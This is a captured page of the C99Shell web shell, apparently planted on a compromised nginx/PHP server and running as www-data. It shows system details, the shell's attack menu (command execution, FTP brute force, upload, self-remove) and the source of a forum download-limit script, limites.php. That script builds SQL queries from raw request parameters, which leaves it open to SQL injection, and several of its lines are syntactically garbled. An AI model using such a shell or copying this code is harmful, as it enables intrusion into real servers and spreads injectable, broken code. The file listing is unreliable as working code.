!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: nginx/1.23.4. PHP/5.6.40-65+ubuntu20.04.1+deb.sury.org+1 

uname -a: Linux foro-restaurado-2 5.15.0-1040-oracle #46-Ubuntu SMP Fri Jul 14 21:47:21 UTC 2023
aarch64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/home/wwwroot/frames/   drwxrwxr-x
Free 83.3 GB of 96.73 GB (86.12%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     limites.php (2.28 KB)      -rw-rw-r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php   
    // cambio de tercio. Primero se mira si es un usuario, so no lo es, es an�nimo.
    $sql="SELECT t1.session_user_id, t2.username_clean as usuario
    FROM phpbb_sessions t1, phpbb_users t2
    WHERE t1.session_user_id = t2.user_id
    AND t1.session_id = '".$_REQUEST['phpbb3_f6ktf_sid']."'";

    $res=mysql_query($sql,$conn);
    @$row=mysql_fetch_array($res);


      
    if ($row[session_user_id]==or   !$row[session_user_id]){
            
            // es anonimo
            $user="an�nimo";
            $grupo="an�nimo";
            // como es anonimo, lo vemos por ip:
           if ($_SERVER) {
          $realip $_SERVER["REMOTE_ADDR"];

          } else {

          $realip getenv'REMOTE_ADDR' );

          }
          
          // query de control de bajada
    $query="SELECT ip, count(ip) AS contador FROM `estadistica`  where date(fecha) = curdate() and ip='{$realip}' and accion='descarga' group by  (ip) order by count(ip) desc";
   
$rescontrol=mysql_query($query,$conn);

@$rowcontrol=mysql_fetch_array($rescontrol);
$descargado=$rowcontrol['contador'];      
          



          // fin anonimo  
      }else{
            
            // usuario registrado
              $user=$row['usuario'];
            // sacamos lo descargado por el usuario
            $query="SELECT nick, count(nick) AS contador FROM `estadistica`  where date(fecha) = curdate() and nick='$user' and accion='descarga' group by  nick ";
   
$rescontrol=mysql_query($query,$conn);

@$rowcontrol=mysql_fetch_array($rescontrol);
$descargado=$rowcontrol['contador'];    
      
            // buscamos el grupo. si no se encuentra, es normal
          $sql="SELECT t1.usuario,t1.grupo, t2.limite FROM control_usuarios as t1, limites_usuarios as t2  WHERE t1.grupo=t2.grupo and t1.usuario='$user'";

          $res2=mysql_query($sql,$conn);
@          $row2=mysql_fetch_array($res2);

              if (empty($row2['grupo'])){
            // no se encuentra
        
            $grupo="normal";
            }else{
            // es colaborador o administrador
            $grupo=$row2['grupo'];
            }

     }
      
    $sql="select limite from limites_usuarios where grupo='$grupo'";

    $resv=mysql_query($sql,$conn);
@    $rowv=mysql_fetch_array($resv);

        $limite_descargas=$rowv['limite'];
        $descargas_pendientes=$limite_descargas-$descargado ;
        /*
             echo "usuario:    $user".chr(10);
    echo "limite es ".$limite_descargas.chr(10);
    echo "descargado=$descargado".chr(10);
    echo "descargas_pendientes=$descargas_pendientes".chr(10) ;
    */















         

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 
:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by HackingTool | HackingTool | Generation time: 0.0044 ]--